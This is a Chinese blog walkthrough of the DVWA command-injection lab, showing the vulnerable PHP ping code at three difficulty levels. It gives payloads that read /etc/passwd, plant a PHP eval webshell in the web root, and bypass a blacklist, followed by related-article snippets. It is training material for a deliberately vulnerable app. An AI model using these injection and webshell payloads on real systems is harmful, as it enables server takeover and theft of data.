DVWA【Command Execution】命令注入模块

最新推荐文章于 2023-01-23 14:21:00 发布
最新推荐文章于 2023-01-23 14:21:00 发布
阅读量402 收藏 5
点赞数
文章标签: DVWA Command Execution 命令注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42342141/article/details/103129759
版权

一、工具

靶机 Metasploitable2
WebApplication——DVWA
菜刀——蚁剑

二、原理及条件

原理: 是指在某些需要输入数据的位置,还构造了恶意的代码破坏了原先的语句结构。而系统缺少有效的过滤,最终达到破坏数据、信息泄露甚至掌控电脑的目的。(通过web程序,在服务器上拼接系统命令)

注入条件:

  • web应用程序调用可执行系统命令的函数
  • 执行系统命令的函数或函数的参数可控
  • 可控参数可拼接注入参数

具体实战

正常输入:
在这里插入图片描述

low等级

后台代码:
<?php 
if( isset( $_POST[ 'submit' ] ) ) { 
    $target = $_REQUEST[ 'ip' ]; 
    // Determine OS and execute the ping command. 
    if (stristr(php_uname('s'), 'Windows NT')) {  
        $cmd = shell_exec( 'ping  ' . $target ); 
        echo '<pre>'.$cmd.'</pre>';   
    } else {  
        $cmd = shell_exec( 'ping  -c 3 ' . $target ); 
        echo '<pre>'.$cmd.'</pre>'; 
    }   
} 
?>

发现对输入没有做任何过滤处理!

127.0.0.1 && /cat /etc/passwd    发现可行

简单介绍下 linux 里  && 、&、||、|
&& 表示前一条命令执行成功时,才执行后一条命令 ,如 echo ‘1‘ && echo ‘2’    
&  表示任务在后台执行,如要在后台运行redis-server,则有  redis-server &
| 表示管道,上一条命令的输出,作为下一条命令参数的输入,如 echo ‘yes’ | wc -l
|| 表示前一条命令执行失败后,才执行下一条命令,如 cat nofile || echo “fail”

在这里插入图片描述
接下来我就直接介绍怎么注入木马拿库

之前有次线上的比赛,被虐死,其中web有道题就命令注入
然后有人先进库拿到了flag,但是他没退出来,而是选择“监视”
看到有人上传木马他就删了(是的,大佬比较闲,后面还是举办方又重新上线那个web)
所以,实际点,上手就直接拿webshell

127.0.0.1; echo "<?php @eval(\$_POST["hack"])?>" > /var/www/test.php

127 || echo "<?php @eval(\$_POST["hack"])?>" > /var/www/test.php

127.0.0.1 | echo "<?php @eval(\$_POST["hack"])?>" > /var/www/test.php

127.0.0.1 && echo "<?php @eval(\$_POST["hack"])?>" > /var/www/test.php 

127.0.0.1 & echo "<?php @eval(\$_POST["hack"])?>" > /var/www/test.php
注【我这里写的文件保存在web根目录下,只是为了方便】  \  是用来转义的

在这里插入图片描述
在这里插入图片描述
发现上传成功! 接着就可以上菜刀连了
在这里插入图片描述
具体蚁剑的连接参考
在这里插入图片描述
我们线上当时flag就在根目录里,是个隐式文件 。结果那家伙待在这监视,还把那个文件内容给改了,也就是就算没有删除上传的木马,后面人拿到的flag也是错的!
其他代码我就不演示了!我都试过也是可以运行的

medium等级

后台代码:
<?php 
if( isset( $_POST[ 'submit'] ) ) { 
    $target = $_REQUEST[ 'ip' ]; 
    // Remove any of the charactars in the array (blacklist). 
    $substitutions = array( 
        '&&' => '', 
        ';' => '', 
    ); 
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); 
    // Determine OS and execute the ping command. 
    if (stristr(php_uname('s'), 'Windows NT')) {  
        $cmd = shell_exec( 'ping  ' . $target ); 
        echo '<pre>'.$cmd.'</pre>'; 
    } else {  
        $cmd = shell_exec( 'ping  -c 3 ' . $target ); 
        echo '<pre>'.$cmd.'</pre>';        
    } 
} 
?>

分析后,发现只是对 && 和 ; 进行了过滤

绕过代码:
127 || echo "<?php @eval(\$_POST["hack"])?>" > /var/www/test.php

127.0.0.1 | echo "<?php @eval(\$_POST["hack"])?>" > /var/www/test.php

127.0.0.1 & echo "<?php @eval(\$_POST["hack"])?>" > /var/www/test.php

127.0.0.1 &;& echo "<?php @eval(\$_POST["hack"])?>" > /var/www/test.php
上面这条也可以用,这也是技巧,系统先过滤掉 ;  没有第二遍过滤 &&

在这里插入图片描述
接着就是菜刀拿库了!

high等级

<?php 
if( isset( $_POST[ 'submit' ] ) ) { 
    $target = $_REQUEST["ip"];   
    $target = stripslashes( $target ); 
    // Split the IP into 4 octects 
    $octet = explode(".", $target); 
    // Check IF each octet is an integer 
    if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4)  ) { 
    // If all 4 octets are int's put the IP back together. 
    $target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3]; 
        // Determine OS and execute the ping command. 
        if (stristr(php_uname('s'), 'Windows NT')) {  
            $cmd = shell_exec( 'ping  ' . $target ); 
            echo '<pre>'.$cmd.'</pre>';   
        } else {  
            $cmd = shell_exec( 'ping  -c 3 ' . $target ); 
            echo '<pre>'.$cmd.'</pre>';   
        } 
    }   
    else { 
        echo '<pre>ERROR: You have entered an invalid IP</pre>'; 
    }    
} 
?>

这个就基本没戏了,系统对输入进行 “.” 分割,还对各个部分判断是否是数字字符串,然后再重组。

初学者L_言
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通过DVWA学习命令执行漏洞(Command Execution
Mi1k7ea
01-20 6587
通过DVWA学习命令执行漏洞(Command Execution)   作为初学者的笔记,有何问题或建议请大牛们不吝指教~ 在系统终端中,要想输入多条命令,可以在一条命令结束之后用分号(;)来隔开进而进行下一条命令的执行。另外也可以通过&&来替换分号,前提是前面的命令正确执行之后才能接着执行后面的命令命令执行漏洞也正因此而产生。   先看low级: 提示让我们输入一个IP地址来实现p
DVWACommand Execution
GVFDBDF的专栏
09-05 1572
1、源码审计(LOW级别) if( isset( $_POST[ 'submit' ] ) ) {     $target = $_REQUEST[ 'ip' ];     // Determine OS and execute the ping command.     if (stristr(php_uname('s'), 'Windows NT')) {
DVWA闯关Command Execution
LainWith的博客
08-07 730
高中低难度低级难度中等难度高级难度不可能难度 低级难度 首先看一下题目,说的是让我们输入一个IP,它会发起ping包,确实如此。 再来查看一下源代码 <?php if( isset( $_POST[ 'submit' ] ) ) { $target = $_REQUEST[ 'ip' ]; if (stristr(php_uname('s'), 'Windows NT')) { $cmd = shell_exec( 'ping ' . $target );
【靶场训练_DVWACommand Execution
diemaoye6838的博客
09-13 239
low 利用: ;ls ../../ 源码分析: <?php if( isset( $_POST[ 'submit' ] ) ) { //将ip对应的值复制给target $target = $_REQUEST[ 'ip' ]; if (stristr(php_uname('s'), 'Win...
dvwa靶场Command Execution全难度教程(附带代码分析)
m0_73248913的博客
01-23 765
建议使用owaspbwa靶场可以不用搭建dvwa以及其他常用靶场,省去搭建靶场的困扰,但是此靶机靶场较老,并不建议使用。这里的代码直接把我们输入的语句的符号过滤再进行数字的拆分,重新拼接成ip再来执行ping命令,没有我们操作的空间。注:此靶场是windows上搭建的会有显示问题,而且这个是过滤了'()'的是只能使用反弹shell进行的。此处选择自己喜欢的样式就行,记得全都要去试试,建议使用'&','|',';没有回显是正常情况,这个是直接执行,保存文件实在本机目录,直接访问写入的文件名就可以。
命令注入讲解ppt.pptx
08-10
进入页面后,可以看到 DVWA 提供了测试域名 /IP 的 Ping 服务(命令执行漏洞测试模块),并将 Ping 命令的执行过程显示出来。下面可以先测试一下域名 www.baidu.com 是否可以正常连接,发现可以正常显示出连接结果。...
DVWA之SQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWA_Tool.rar
02-13
Web应用程序(DVWA)是一个很容易受到攻击的PHP / MySQL Web应用程序。其主要目标是帮助安全专业...DVWA的目标是通过简单直接的界面练习一些最常见的Web漏洞,具有各种难度。请注意,此软件存在记录和未记录的漏洞。
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
dvwa执行php,DVWACommand Execution命令执行漏洞
weixin_39790686的博客
03-27 399
Command Execution命令执行漏洞,或称为命令注入漏洞。安全级别为Low时,输入正确的IP地址,提交后返回ping 命令的结果如果输入的值是非IP地址的值,则返回的是不正常结果现在我们输入正确的ip地址以及连接命令,如输入127.0.0.1 && net user返回结果如下:说明除了执行ping 命令外,还执行了net user命令,造成任意命令执行漏洞。查看漏洞源代...
DVWA学习之Command Injection(命令注入)
weixin_40950781的博客
08-17 713
DVWA学习之Command InjectionCommand Injection(命令注入)0x01何为命令注入?0x02 命令注入漏洞产生的原因0x03dvwa乱码问题0x04 Low级别0x05 medium级别0x06 high级别0x07 impossible级别 Command Injection(命令注入) 0x01何为命令注入Command Injeciont 即命令注入,是指...
DVWA-Command Injection(High)
七月_的博客
10-22 369
文章目录Command Injection(High)代码分析漏洞利用 Command Injection(High) 代码分析 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = trim($_REQUEST[ 'ip' ]); // Set blacklist $substitutions = a...
攻防世界 WEB 新手练习区 command_execution 教程
weixin_44716769的博客
01-13 699
攻防世界 WEB 新手练习区 command_execution 教程 考点:类似于DVWA命令行注入 题目 War的意思是防火墙,即本题中没有防火墙 查看源码,没有任何的字符过滤 Ping 127.0.0.1 用linux命令,列出目前工作目录所含之文件及子目录 没有可以利用的文件,查找含有文件名含有flag的文件 打开flag.txt文件看看 ...
DVWA - Command Injection (low, medium, high)
无节操
01-05 1089
low查看源码// Get input $target = $_REQUEST[ 'ip' ];// Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping ' . $targ
DVWA Command Injection 通关教程
weixin_30703911的博客
08-20 266
Command Injection 介绍 命令注入Command Injection),对一些函数的参数没有做过滤或过滤不严导致的,可以执行系统或者应用指令(CMD命令或者bash命令)的一种注入攻击手段。PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一。 判断命令注入流程 是否调用系统命令 函数或函数的参数是否可控 是否拼接注入命令 命令连接符 c...
DVWA命令注入漏洞
HoYim
04-11 358
命令注入 1.Windows:(WinServer2003–192.168.31.2的dvwa: A;B 先A后B A&B AB无制约关系 A|B 显示B的执行结果 A&&B A成功执行B A||B A失败执行B 低安全级别: 看源码(windows系统默认发四个包,Linux系统默认是一直发包,所以得-c 4) 127.0.0.1&&dir(...
DVWAcommand injection
__52Hz__
07-28 1268
原文地址:http://www.fwqtg.net/注入技术-dvwa命令注入.html (转载了部分内容) Command Injection,即命令注入攻击,是指由于Web应用程序对用户提交的数据过滤不严格,导致黑客可以通过构造特殊命令字符串的方式,将数据提交至Web应用程序中,并利用该方式执行外部程序或系统命令实施攻击,非法获取数据或者网络资源等。 一
命令注入(Command Injection)
qq_17762247的博客
05-10 1027
一、Low 1、服务端代码 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shel
dvwa命令注入爆错
最新发布
07-10
例如,你可能会看到类似于“SQL syntax error”、“Command execution failed”或“Permission denied”这样的错误信息。开发者在调试这类错误时,通常会检查输入验证、预编译语句等安全措施是否到位。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值